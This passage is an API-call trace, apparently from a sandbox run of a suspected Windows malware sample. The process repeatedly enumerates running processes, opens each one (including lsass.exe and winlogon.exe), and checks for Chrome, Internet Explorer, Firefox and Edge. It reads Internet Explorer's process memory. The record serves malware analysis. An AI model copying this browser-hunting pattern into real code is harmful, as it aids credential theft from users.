	[0246.560] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0246.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.560] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0246.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.561] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.561] NtQueryInformationProcess (in: ProcessHandle=0x9614, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0246.561] ReadProcessMemory (in: hProcess=0x9614, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0246.561] ReadProcessMemory (in: hProcess=0x9614, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0246.561] ReadProcessMemory (in: hProcess=0x9614, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0246.561] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0246.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9618
	[0246.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.563] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0246.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.563] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.563] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0246.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.564] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.564] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0246.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x961c
	[0246.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.565] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0246.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.565] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.566] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0246.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.566] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.566] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9620
	[0246.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.567] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.567] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.568] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.568] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.568] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.569] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9624
	[0246.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.570] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.570] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.570] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.571] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.571] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9628
	[0246.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.572] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.573] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.573] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.573] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.574] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x962c
	[0246.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.575] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0246.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.576] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.576] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0246.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.576] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9630
	[0246.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.577] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.578] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.578] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.578] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.579] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9634
	[0246.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.579] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.580] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.580] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.580] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.581] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0246.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9638
	[0246.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.581] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0246.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.582] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.582] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0246.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.582] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.582] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0246.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x963c
	[0246.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.583] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.584] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.584] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.584] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0246.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9640
	[0246.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.585] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0246.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.586] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.586] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0246.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.586] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.586] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9644
	[0246.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.587] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.587] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.588] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.588] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.588] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0246.589] CloseHandle (hObject=0x4fd0) returned 1
	[0246.589] Sleep (dwMilliseconds=0x64) 
	[0246.684] GetCurrentProcessId () returned 0x110
	[0246.684] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0246.691] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0246.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0246.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0246.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9648
	[0246.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.697] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.697] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.698] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.698] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x964c
	[0246.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.700] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.700] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.700] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.701] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0246.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9650
	[0246.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.702] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0246.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.702] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.703] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0246.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.703] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9654
	[0246.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.704] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.705] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.705] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.705] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0246.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9658
	[0246.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.706] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0246.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.706] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.707] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0246.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.707] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.707] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0246.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x965c
	[0246.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.708] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0246.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.709] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.709] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0246.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.709] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.709] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0246.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9660
	[0246.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.710] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0246.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.711] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.711] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0246.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.711] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0246.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9664
	[0246.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.712] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0246.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.713] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.713] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0246.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.713] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9668
	[0246.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.715] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.715] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.716] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.716] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.716] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x966c
	[0246.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.717] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.718] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.718] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.718] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.718] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
